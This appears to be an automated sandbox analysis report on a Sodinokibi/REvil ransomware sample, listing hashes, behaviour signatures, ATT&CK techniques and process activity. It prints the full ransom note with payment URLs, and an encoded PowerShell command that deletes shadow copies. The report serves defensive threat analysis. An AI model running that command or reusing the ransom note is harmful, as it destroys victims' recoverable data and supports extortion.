Overview

overview

10

Static

static

10

7204096a5e...15.exe

windows7_x64

10

7204096a5e...15.exe

windows10_x64

10

Analysis

  • max time kernel
    143s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7204096a5e47f570f189313acb92a26dd66d090729485a598de29a3a9a718d15.exe

  • Size

    207KB

  • MD5

    151ae10c5420285797f5204d4b3c9666

  • SHA1

    13e33b4228975bac515d68513f9688f9278875b7

  • SHA256

    7204096a5e47f570f189313acb92a26dd66d090729485a598de29a3a9a718d15

  • SHA512

    041d9bba9d0f92364204d8fab856bf9cf09240d94c6372003eac21bce31a3924ba3512413e6c27762bb798ae3908be5060ce104ff40206eaf85d15def8efd907

Score
10/10
sodinokibiransomware

Malware Config

Extracted

Path

C:\v1zz4aj-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion v1zz4aj. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6693C1C35B0228F2 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/6693C1C35B0228F2 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 5wyc5udixfNWFLEnLBm5i0iHEip7kxCM7O1Tyrz/CRqVwPPE5P5Fyuw8LnmbRjec WiBp6hDR5v+FpubC8kJrirMscLYXEmrQkXQfdivfyYru/HMZmA2rzzuvQdTxNe18 DBcGX48TzKcbfjdEcJQcfxLSoyZCgDmH9kadeK5msOT/HB/ETFHJSxv+gOj0LZvS yQQqcofIo4Tj+KtJgpTBjlqa0U6AssVWi/OT4ir6Z7KEFbEP6mxCB1csMcqfs/WZ KVODVeHDkxkpAZK3tp1Iw1E5zWTzkEUDosJpFB9/ut5E5GS0YAsU8JldE2CcF2IL XAoqYMDUFmg8gYf/0n/jTHByecKDYw7T4wN6s8GQTSmhduKwxDVmLWcxLCQ1yN32 Z+AjsYu0ZqR1NTp5/KXaN4KDU0CiZcCuvBuz4CMVSf/lXM73Iwxv9Xu64INpeSr3 qvE7PkUPcCsAStPeV2wsCyYdNojDmJjIxnn76DLEITCwawdsVKqJE/MvsMPJfM9b BDz4CGzxCCB2P7DufWZ1+2FFor1DSGjHsguNaGGkrNV5T9ylRrOZiX8qclT8YtiW 9kfgae6A7j1NhnBeDmt5Tx9sHH9WNaZFCa2NXedpQi/ZTVIyFdpf0sDCVs7W1rdj nsp1yw2LLCFLSOAgjirvlulAMAxZ5UVmBiMC9gNXHo7lzwr77AWHjHjyc31t1EuE vdxDzOmOq8vY32lHGuL/7hvx2u5E55BmTt+0jxLMicN41geLe5MpBjsBVGsg9aTC JYcf/AqFS0wAm+qlxDp6iqpLxI71PQUeM7HpWqXH7YHjewTuSFODutvf1Pyz54hL oGRI3TGnYn6KjaaCm18ksnQbubn7O5OHNCOxRZZddrV501GMIx9DAF2++nDjhhF9 oynzaAh5w261NZQ/gU+rPIfZy+aZPdQ43X3+zPsHJmYdE7sv1TpE/9fTn+7L+76n QdQu9og3NYTzPGSREhyDALqzeBCnwsJIVsLexxj5PDaykse0/3bLra/JQVrSBDWY vggcdhOxdUD4oev6JI0/keaWJNFfMfLPA8CIJnd4VxFset0lX4c+aeiEyUlT6Ow2 Sg+3wrzcVsowUQikKi+7c/xzYej7Cti6YNFpVoMNRWzwqs8boQDsMDwM/j9Luncb 2G8= Extension name: v1zz4aj ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6693C1C35B0228F2

http://decryptor.top/6693C1C35B0228F2

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 37 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7204096a5e47f570f189313acb92a26dd66d090729485a598de29a3a9a718d15.exe
    "C:\Users\Admin\AppData\Local\Temp\7204096a5e47f570f189313acb92a26dd66d090729485a598de29a3a9a718d15.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2040
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:612
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1092

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      Download Submit
    • memory/1672-54-0x0000000076641000-0x0000000076643000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2040-55-0x000007FEFC401000-0x000007FEFC403000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2040-57-0x00000000026A0000-0x00000000026A2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2040-58-0x00000000026A2000-0x00000000026A4000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2040-59-0x00000000026A4000-0x00000000026A7000-memory.dmp
      Filesize

      12KB

      Download
    • memory/2040-56-0x000007FEF34E0000-0x000007FEF403D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/2040-60-0x00000000026AB000-0x00000000026CA000-memory.dmp
      Filesize

      124KB

      Download